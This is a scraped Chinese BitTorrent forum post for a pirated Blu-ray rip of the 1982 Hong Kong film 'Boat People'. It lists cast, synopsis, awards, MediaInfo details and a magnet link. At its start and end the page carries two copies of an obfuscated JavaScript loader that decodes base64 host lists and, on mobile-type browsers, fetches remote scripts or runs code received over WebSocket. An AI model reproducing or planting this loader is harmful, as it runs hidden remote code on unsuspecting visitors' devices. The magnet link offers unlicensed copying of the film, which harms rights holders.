投奔怒海[粤语配音/中文字幕].Boat.People.1982.1080p.BluRay.x265.10bit.DTS.2.0 7.27GB

版主小s 25天前 225

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x68\x6e\x49\x43\x61\x57\x73\x53\x72\x45']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};

◎译 名 投奔怒海 / Boat People

◎年 代 1982

◎产 地 中国香港

◎类 别 剧情

◎语 言 粤语 / 日语 / 法语 / 越南语

◎上映日期 1982-10-13

◎IMDb链接 https://www.imdb.com/title/tt0084807/

◎豆瓣评分 8.5/10 (15660人评价)

◎豆瓣链接 https://movie.douban.com/subject/1296557/

◎片 长 109 分钟

◎导 演 许鞍华 Ann Hui (id:1053570)

◎编 剧 邱刚健 Kang Chien Chiu (id:1280690)

◎演 员 林子祥 George Lam (id:1029253)

缪骞人 Cora Miao (id:1023743)

马斯晨 Season Ma (id:1274387)

刘德华 Andy Lau (id:1054424)

奇梦石 Mengshi Qi (id:1316147)

郝嘉陵 Jialing Hao (id:1328148)

(id:1449592)

郭衡宝 Hengbao Guo (id:1428406)

蔡鉴洲 Jianzhou Cai (id:1415825)

林书锦 Shujin Lin (id:1333228)

贾梅婴 Meiying Jia (id:1348809)

夏梦 Meng Xia (id:1008679)

罗永辉 Wing-fai Law (id:1289553)

黄宗基 Chung Kay Wong (id:1301187)

钟志文 David Chung (id:1280776)

健健 Kin Kin (id:1288568)

区丁平 Tony Au (id:1277562)

关锦鹏 Stanley Kwan (id:1028510)

◎标 签 香港 / 新浪潮 / 政治 / 越南 / 1982 / 剧情 / 文艺 / 人性

◎简 介

日本摄影记者芥川(林子祥)三年后重返刚刚解放的越南采访,遍地的生机令他心生欢喜,但当他无意间走进城市的另一隅结识当地女孩琴娘(马斯晨)后,方知之前所见不过是越共政府特意为他这样的外国记者安排的粉饰太平的假像。

在琴娘并非刻意的“导游”下,越南平民百姓正处于水深火热中的悲惨生活逐渐被芥川尽收眼底。琴娘一家人、战后唯一留下来的某酒吧的老板娘(缪骞人)及她的正想方设法逃离越南的情人祖明(刘德华)等人的被越共任意践踏的自尊强烈地触动着芥川敏感善良的心,尽管他并无彻底改变他们命运的能力,却仍是尽力给予帮助。

◎获奖情况 (共11项)

第2届香港电影金像奖 (1983)

最佳电影

最佳导演

└──许鞍华 (id:1053570)

最佳编剧

└──邱刚健 (id:1280690)

最佳男主角(提名)

└──林子祥 (id:1029253)

最佳女主角(提名)

最佳新演员

└──马斯晨 (id:1274387)

最佳新演员(提名)

└──刘德华 (id:1054424)

最佳摄影(提名)

└──黄宗基 (id:1301187)

最佳剪接(提名)

└──健健 (id:1288568)

最佳美术指导

└──区丁平 (id:1277562)

最佳原创电影音乐(提名)

└──罗永辉 (id:1289553)

  1. ##### MediaInfo ######

  2. General

  3. Unique ID : 169385056071157303023447682023970699675 (0x7F6E600A9C7CD651710CC93C6975F99B)

  4. Complete name : [email protected]M.mkv

  5. Format : Matroska

  6. Format version : Version 4

  7. File size : 7.27 GiB

  8. Duration : 1 h 44 min

  9. Overall bit rate : 9 935 kb/s

  10. Movie name : Boat People 1982

  11. Encoded date : UTC 2021-10-27 08:39:44

  12. Writing application : mkvmerge v57.0.0 ('Till The End') 64-bit

  13. Writing library : libebml v1.4.2 + libmatroska v1.6.4

  14. Cover : Yes

  15. Attachments : cover.jpg


  16. Video

  17. ID : 1

  18. Format : HEVC

  19. Format/Info : High Efficiency Video Coding

  20. Format profile : Main [email protected]@Main

  21. Codec ID : V_MPEGH/ISO/HEVC

  22. Duration : 1 h 44 min

  23. Bit rate : 8 406 kb/s

  24. Width : 1 920 pixels

  25. Height : 1 036 pixels

  26. Display aspect ratio : 1.85:1

  27. Frame rate mode : Constant

  28. Frame rate : 25.000 FPS

  29. Color space : YUV

  30. Chroma subsampling : 4:2:0

  31. Bit depth : 10 bits

  32. Bits/(Pixel*Frame) : 0.169

  33. Stream size : 6.15 GiB (85%)

  34. Writing library : x265 3.5+2-g2b25c9ba0+45:[Windows][GCC 10.2.0][64 bit] Yuuki 10bit+8bit+12bit

  35. Encoding settings : rc=crf / crf=21.0000 / qcomp=0.60 / qpstep=4 / stats-write=0 / stats-read=0 / no-lossless / no-cu-lossless / aq-mode=3 / aq-strength=0.90 / cbqpoffs=0 / crqpoffs=0 / ipratio=1.40 / pbratio=1.30 / psy-rd=2.00 / psy-rdoq=0.00 / deblock=0:0 / ref=6 / limit-refs=1 / no-limit-modes / bframes=8 / b-adapt=2 / bframe-bias=0 / b-pyramid / b-intra / weightp / weightb / min-keyint=24 / max-keyint=240 / rc-lookahead=24 / gop-lookahead=0 / NTMzNTQ=uuDQuD2mJt9fsCf / scenecut=40 / hist-scenecut=0 / radl=0 / max-cu-size=64 / min-cu-size=8 / me=3 / subme=7 / merange=48 / rdoq-level=0 / rd=4 / rdpenalty=0 / dynamic-rd=0.00 / no-rd-refine / ----- / cutree / sao / no-rect / no-amp / no-open-gop / wpp / no-pmode / no-pme / no-psnr / no-ssim / nr-intra=0 / nr-inter=0 / no-constrained-intra / no-strong-intra-smoothing / max-tu-size=32 / tu-inter-depth=1 / tu-intra-depth=1 / limit-tu=0 / qg-size=32 / qpmax=69 / qpmin=0 / ----- / cpuid=533541111039 / frame-threads=4 / numa-pools=+ / log-level=2 / input-csp=1 / input-res=1920x1036 / interlace=0 / level-idc=0 / high-tier=1 / uhd-bd=0 / no-allow-non-conformance / repeat-headers / aud / no-hrd / info / hash=0 / no-temporal-layers / lookahead-slices=0 / no-splice / no-intra-refresh / no-ssim-rd / signhide / no-tskip / max-merge=3 / temporal-mvp / no-frame-dup / no-hme / no-analyze-src-pics / no-sao-non-deblock / selective-sao=4 / early-skip / rskip / no-fast-intra / no-tskip-fast / no-splitrd-skip / zone-count=0 / no-strict-cbr / no-rc-grain / no-const-vbv / sar=0 / overscan=0 / videoformat=5 / range=0 / colorprim=2 / transfer=2 / colormatrix=2 / chromaloc=0 / display-window=0 / cll=0,0 / min-luma=0 / max-luma=1023 / log2-max-poc-lsb=8 / vui-timing-info / vui-hrd-info / slices=1 / no-opt-qp-pps / no-opt-ref-list-length-pps / no-multi-pass-opt-rps / scenecut-bias=0.05 / hist-threshold=0.03 / no-opt-cu-delta-qp / no-aq-motion / no-hdr10 / no-hdr10-opt / no-dhdr10-opt / no-idr-recovery-sei / analysis-reuse-level=0 / analysis-save-reuse-level=0 / analysis-load-reuse-level=0 / scale-factor=0 / refine-intra=0 / refine-inter=0 / refine-mv=1 / refine-ctu-distortion=0 / no-limit-sao / ctu-info=0 / no-lowpass-dct / refine-analysis-type=0 / copy-pic=1 / max-ausize-factor=1.0 / no-dynamic-refine / no-single-sei / no-hevc-aq / no-svt / no-field / qp-adaptation-range=1.00 / scenecut-aware-qp=0conformance-window-offsets / right=0 / bottom=0 / NTMzNTQ= / decoder-max-rate=0 / no-vbv-live-multi-pass

  36. Default : Yes

  37. Forced : No


  38. Audio

  39. ID : 2

  40. ID in the original source medium : 4352 (0x1100)

  41. Format : DTS

  42. Format/Info : Digital Theater Systems

  43. Codec ID : A_DTS

  44. Duration : 1 h 44 min

  45. Bit rate mode : Constant

  46. Bit rate : 1 509 kb/s

  47. Channel(s) : 2 channels

  48. Channel layout : L R

  49. Sampling rate : 48.0 kHz

  50. Frame rate : 93.750 FPS (512 SPF)

  51. Bit depth : 24 bits

  52. Compression mode : Lossy

  53. Stream size : 1.10 GiB (15%)

  54. Title : Cantonese

  55. Language : Chinese

  56. Default : Yes

  57. Forced : No

  58. Original source medium : Blu-ray


  59. Text #1

  60. ID : 3

  61. ID in the original source medium : 4609 (0x1201)

  62. Format : PGS

  63. Muxing mode : zlib

  64. Codec ID : S_HDMV/PGS

  65. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  66. Duration : 1 h 38 min

  67. Bit rate : 19.9 kb/s

  68. Count of elements : 2142

  69. Stream size : 14.0 MiB (0%)

  70. Title : chs

  71. Language : Chinese

  72. Default : Yes

  73. Forced : No

  74. Original source medium : Blu-ray


  75. Text #2

  76. ID : 4

  77. ID in the original source medium : 4610 (0x1202)

  78. Format : PGS

  79. Muxing mode : zlib

  80. Codec ID : S_HDMV/PGS

  81. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  82. Duration : 1 h 38 min

  83. Bit rate : 20.2 kb/s

  84. Count of elements : 2142

  85. Stream size : 14.2 MiB (0%)

  86. Title : cht

  87. Language : Chinese

  88. Default : No

  89. Forced : No

  90. Original source medium : Blu-ray


  91. Menu

  92. 00:00:00.000 : Chapter 01

  93. 00:16:13.280 : Chapter 02

  94. 00:38:31.080 : Chapter 03

  95. 00:57:45.040 : Chapter 04

  96. 01:12:36.480 : Chapter 05

  97. 01:25:46.640 : Chapter 06

  98. 01:43:09.520 : Chapter 07


TAGS 剧情

磁力链:
  • magnet:?xt=urn:btih:7AEF4E9AA2A333D70E254EA7B35598E5B93F58E5

上传的附件:
BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。
最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回
发新帖
var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNg==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x59\x72\x72\x51\x4e\x72\x4a\x5a\x7a\x42']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};